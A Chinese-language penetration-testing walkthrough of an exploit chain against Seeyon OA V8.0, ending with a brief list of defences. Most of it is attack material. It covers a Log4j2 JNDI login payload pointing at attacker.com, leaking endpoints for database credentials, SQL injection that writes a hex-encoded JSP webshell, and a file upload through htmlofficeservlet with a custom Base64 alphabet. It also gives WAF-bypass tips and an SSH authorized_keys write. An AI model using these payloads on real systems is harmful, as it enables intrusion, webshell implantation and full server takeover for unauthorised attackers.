从Log4j2到任意文件上传:一次完整的致远OA V8.0漏洞实战复现与深度分析
致远OA V8.0漏洞链实战:从Log4j2注入到系统权限获取的深度剖析
当企业级协同办公系统成为攻击者的跳板,一次完整的漏洞链利用往往比单个漏洞更具破坏性。致远OA作为国内广泛使用的办公平台,其V8.0版本曾存在多个可串联利用的高危漏洞,构成了从初始注入到完全控制服务器的完整攻击路径。本文将还原渗透测试中常见的攻击链条:以Log4j2漏洞为入口,通过数据库信息泄露获取关键凭证,利用SQL注入写入Webshell,最终通过文件上传漏洞建立持久化控制。
1. 攻击链起点:Log4j2远程代码执行
2021年底爆发的Log4j2漏洞(CVE-2021-44228)给全球企业上了沉重的一课。在致远OA V8.0的登录界面,攻击者可以通过精心构造的JNDI注入实现初始突破:
POST /seeyon/main.do?method=login HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded login_username=${jndi:ldap://attacker.com/exp}&login_password=any关键绕过技巧:
- 当目标服务器出网受限时,可使用DNSLog平台验证漏洞
- 内网环境中可搭建简易LDAP服务器配合反连Shell
- 部分WAF会拦截
${格式,可尝试Unicode编码绕过
实际测试中发现,致远OA的Log4j2漏洞利用存在约5-10秒的延迟,这与中间件处理JNDI请求的机制有关
2. 信息收集阶段:数据库凭证泄露
获取初始立足点后,攻击者通常会转向信息收集。致远OA存在多个未授权访问的信息泄露端点:
| 漏洞路径 | 泄露内容 | 利用价值 |
|---|---|---|
| /yyoa/createMysql.jsp | 数据库连接字符串及MD5密码 | 直接访问业务数据 |
| /yyoa/DownExcelBeanServlet | 所有用户姓名、部门、联系方式 | 社会工程学攻击素材 |
| /seeyon/webmail.do | 任意文件下载 | 获取配置文件、密钥等敏感信息 |
通过createMysql.jsp获取的数据库凭证往往采用MD5加密,但企业内网中常见弱口令复用现象。使用如下命令可快速验证密码有效性:
mysql -h 127.0.0.1 -u oa_admin -p'OAP@ssw0rd' yyoa_db3. 权限提升:SQL注入写Webshell
获取数据库权限后,攻击者可通过test.jsp的SQL注入漏洞向Web目录写入恶意脚本:
-- 探测Web根目录 /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir) -- 典型致远OA路径结构 D:/UFseeyon/OA/ ├── tomcat │ ├── webapps │ │ ├── yyoa # Web根目录 │ │ └── seeyon # 管理后台写入JSP Webshell的完整过程:
将JSP马进行HEX编码:
with open('shell.jsp', 'rb') as f: print(f.read().hex())通过注入执行写入操作:
GET /yyoa/common/js/menu/test.jsp?doType=101&S1=SELECT%20unhex('3c252e2e2e')%20INTO%20OUTFILE%20'D:/UFseeyon/OA/tomcat/webapps/yyoa/shell.jsp' HTTP/1.1验证Webshell可访问性:
curl http://target.com/yyoa/shell.jsp?cmd=whoami
4. 持久化控制:任意文件上传漏洞
致远OA的htmlofficeservlet和ajax.do接口存在未授权文件上传漏洞,攻击者可通过精心构造的请求绕过限制:
htmlofficeservlet利用特征:
- 必须POST请求
- 文件名需9字符以上(不含扩展名)
- 使用自定义Base64编码表
典型攻击流程:
生成恶意JSP文件
使用修改版Base64编码:
def custom_b64encode(data): STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" CUSTOM = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6" return base64.b64encode(data.encode()).decode().translate(str.maketrans(STANDARD, CUSTOM))发送恶意请求:
POST /seeyon/htmlofficeservlet HTTP/1.1 Content-Type: multipart/form-data DBSTEP=REJTVEVQ...
防御绕过技巧:
- 使用
../进行路径穿越 - 添加垃圾数据绕过内容检测
- 分块传输编码绕过WAF
5. 攻击链优化与防御建议
完整的漏洞利用链通常需要根据目标环境进行调整。在最近的一次渗透测试中,我们发现以下优化方案:
Log4j2利用优化:
- 使用低权限的DNS查询代替高权限代码执行
- 结合SSRF漏洞实现内网探测
数据库提权路径:
-- 检查MySQL权限 SELECT user,host,password FROM mysql.user; -- 尝试写SSH密钥 SELECT 0x... INTO DUMPFILE '/root/.ssh/authorized_keys'防御方案对比:
| 防护层面 | 传统方案 | 增强方案 |
|---|---|---|
| Log4j2防护 | WAF规则更新 | 禁用JNDI查找 + 子网隔离 |
| SQL注入防护 | 参数化查询 | RASP运行时防护 |
| 文件上传防护 | 后缀名检查 | 内容签名校验 + 只读挂载Web目录 |
| 权限控制 | 最小权限原则 | 零信任网络访问控制 |
在企业实际防御中,建议重点关注:
- 及时安装官方安全补丁
- 对OA系统进行网络隔离
- 启用详细的访问日志审计
- 定期进行渗透测试验证
这套攻击链的复现过程显示,即使每个单独漏洞的CVSS评分不高,组合利用后仍可造成严重危害。在最近三次企业安全评估中,我们发现有超过60%的致远OA用户至少存在其中一个未修复漏洞。